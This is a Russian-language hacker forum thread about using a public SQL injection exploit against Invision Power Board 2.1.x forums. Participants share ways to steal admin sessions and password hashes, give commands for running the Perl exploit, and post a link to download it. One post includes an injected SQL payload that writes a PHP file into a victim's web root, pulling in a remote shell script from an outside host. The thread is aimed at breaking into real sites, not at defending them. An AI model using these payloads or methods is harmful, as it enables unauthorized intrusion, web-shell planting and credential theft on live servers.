Форумы Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC

Discussion in 'Уязвимости CMS/форумов' started by InFiNiTy, 14 Jul 2006.

  1. Vilen

    Vilen Banned

    Joined:
    1 Jul 2006
    Messages:
    51
    Likes Received:
    8
    Reputations:
    -1
    - - -
     
    #21 Vilen, 17 Jul 2006
    Last edited: 1 Dec 2008
  2. Brahma

    Brahma Elder - Старейшина

    Joined:
    14 Jul 2006
    Messages:
    55
    Likes Received:
    13
    Reputations:
    6
    Вполне возможно что твой аккаунт забанили, насколько я знаю - эксп. RST оставляет сообщение, благодаря которому и существует возможность sql inj. Попробуй создать другой аккаунт.
    P.S. и действовать быстро.
     
  3. Vilen

    Vilen Banned

    Joined:
    1 Jul 2006
    Messages:
    51
    Likes Received:
    8
    Reputations:
    -1
    - - -
     
    #23 Vilen, 17 Jul 2006
    Last edited: 1 Dec 2008
  4. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,002
    Likes Received:
    435
    Reputations:
    90
    Exploit для IPB работает нормально, я так уже стал сеперюзером на форуме
     
    1 person likes this.
  5. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    сразу извиняюсь, я ipb не очень знаком:(
    как я понял converge_pass_hash это хеш паса с солью,converge_pass_salt сама соль. А что такое member_login_key,legacy_password и чем их едят?
     
  6. Sulf aka Joker

    Sulf aka Joker Elder - Старейшина

    Joined:
    3 Jul 2006
    Messages:
    88
    Likes Received:
    23
    Reputations:
    3
    А это кажется самый первый пасс юзера, не солёный. Но тоже в мд5.
     
  7. Brahma

    Brahma Elder - Старейшина

    Joined:
    14 Jul 2006
    Messages:
    55
    Likes Received:
    13
    Reputations:
    6
    Советую открыть исходник, имхо.
     
    1 person likes this.
  8. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    Исходник чего?форума? так как в exploite происходит только извлечение этого поля из бд.
    тогда я непонимаю логику создателей форума, для чего такое надо.
    в какой момент создается его сессия, когда он появляется на форуме? И только тогда можно получить его сессию?
     
  9. zeppe1in

    zeppe1in Elder - Старейшина

    Joined:
    12 Jul 2006
    Messages:
    343
    Likes Received:
    66
    Reputations:
    18
    По поводу сплойта
    кто знает как выглядит Client_ip в хттп запросе?
     
  10. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    806
    Reputations:
    311
    Хай всем!
    Хочу залить шелл через IPB 2.1.5
    Юзаю http://rst.void.ru/download/r57ipb216gui.txt хэш ворует, ссесию тоже, а вот нового админа не создаёт! И скоко я не смотрел сорс, ничё не понимаю! Пытался и руками куда-то в сплоит дописать как последний ламер
    Code:
    UNION INSERT INTO ibf_faq (id, title, text, description) VALUES(\'98\', \'shell\', \'<? require \\\"http://rst.void.ru/download/r57shell.txt\\\" ?>\', \'To hack this server\'); SELECT text INTO OUTFILE \'C:/AppServ/www/db.php\' FROM ibf_faq where id = \\\"98\\\";
    Но он не создаёт такого файла (В C:/AppServ/www/ уверен, админ оставил phpinfo.php :) )
    Кто поможет сакс хакеру залить шелл?
     
    4 people like this.
  11. Driver

    Driver Member

    Joined:
    5 Jul 2006
    Messages:
    0
    Likes Received:
    8
    Reputations:
    1
    Вручную заголовок подделай.
    Там не трудно... а потом скуль запросом через админку подними себе права...
    Вот мой 100% рабочий запрос, проверял на ИБП 2.1.6 просто подставь свои значения и выполни его...

    короче вырезает форум мой запрос :( если что в асю стукнись - подскажу...

    GET http://<your forum>/admin.php?adsess=<adsess_id>
     
    #31 Driver, 28 Jul 2006
    Last edited: 28 Jul 2006
  12. Sharky

    Sharky Elder - Старейшина

    Joined:
    1 May 2006
    Messages:
    494
    Likes Received:
    312
    Reputations:
    46
    кто нить а подскажите как сплойт этот запустить?
     
  13. a1nt

    a1nt Elder - Старейшина

    Joined:
    16 Dec 2005
    Messages:
    131
    Likes Received:
    39
    Reputations:
    25
    perl C:/гдеонутебялежить/rst.pl
    Разумеется перл нужно скачать.
     
  14. Brahma

    Brahma Elder - Старейшина

    Joined:
    14 Jul 2006
    Messages:
    55
    Likes Received:
    13
    Reputations:
    6
    exmpl:
    Start -> Execute;
    cmd;
    C:\\path_to_perl\\perl.exe C:\\path_to_exploit\\exploit.pl
     
  15. Driver

    Driver Member

    Joined:
    5 Jul 2006
    Messages:
    0
    Likes Received:
    8
    Reputations:
    1
    Не ребят... так дело не пойдет...
    Начну с того, что помочь вручную подделать заголовок я согласился только Пончику, а в асю поломилось пол ачата, ну это ладно, Бог с ним, хорошим людям помочь никогда не жалко, но ведь есть такие, которые пишут в асю, а на мой вопрос, что именно у тебя не получается пишут мне в ответ кучу матов и говорят, что я \"ничего\" не умею и помочь ничем не могу, ну и многое другое...
    В общем все. От меня больше никто никогда не получит никакой помощи здесь. Люди не умеют быть благодарными, не ценят времени и помощи, их не волнует сколько времени человек продолбался над той или иной задачей, они считают его обязанностью помочь им, а для разнообразия в конце еще и обматерят. :(
    Это просто не культурно. Просто не по человечески как то. Аж обидно стало. Ну да ладно... я все сказал.
     
  16. Digimortal

    Digimortal Banned

    Joined:
    22 Aug 2006
    Messages:
    471
    Likes Received:
    248
    Reputations:
    189
    :) м-да, эти лайнеджевцы скоро за любую лишнюю кавычку в запросе банить начнут.. :)
    А насчет сплоита: не понял нафиг этот графич. интерфейс? удобства он в использовании совсем не добавил.
    Я когда етот сплоит испытывал, штук 20 сайтов пересмотрел пока мне не попался один уязвимый, и то сплоит работал наполовину. А так неплохой эксплоит, но, как и любой другой паблик сплоет, по большому счету бесполезный...
     
  17. bandera

    bandera Banned

    Joined:
    2 Jun 2006
    Messages:
    58
    Likes Received:
    37
    Reputations:
    11
    Мля... Влепил бы тебе минусов, да не могу. За то, что темы давнишние поднимаешь да ещё и бессмысленными постами. В этом разделе третья вподряд.

    З.Ы. А [Zarakul] наверное корефан твой раз тебе репутацию на таких постах подымает )
     
    #37 bandera, 6 Sep 2006
    Last edited: 6 Sep 2006
  18. Digimortal

    Digimortal Banned

    Joined:
    22 Aug 2006
    Messages:
    471
    Likes Received:
    248
    Reputations:
    189
    bandera, темы поднимаю я старые потому, что на их дату появления обычно и не смотрю. Если мне охота что-нить написать, я пишу, так что извеняй...

    Zarakul'а я вообще не знаю. На циферку с моей репутацией я даже внимания не обращаю, так как мне эта репутация нафиг не нужна...
     
  19. bandera

    bandera Banned

    Joined:
    2 Jun 2006
    Messages:
    58
    Likes Received:
    37
    Reputations:
    11
    Ёпт так пиши тогда в болталке, если так охота.
     
  20. ~Real F@ck!~

    ~Real F@ck!~ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    283
    Likes Received:
    170
    Reputations:
    -8
    Зачем в ПМ? Сначала надо проверить уязвим ли форум. Затем если он уязвим надо ждать админа пока он прийдёт и залезет на форум, и тогда только ты его сессию спиздиш! А так пока админа на форуме нет жди и думай..... о чем нибудь.
    И еще надо сначала нажать Get admin Session- потом увидиш или -Please later(что то типа такого)- или Попрёт все!
     
Loading...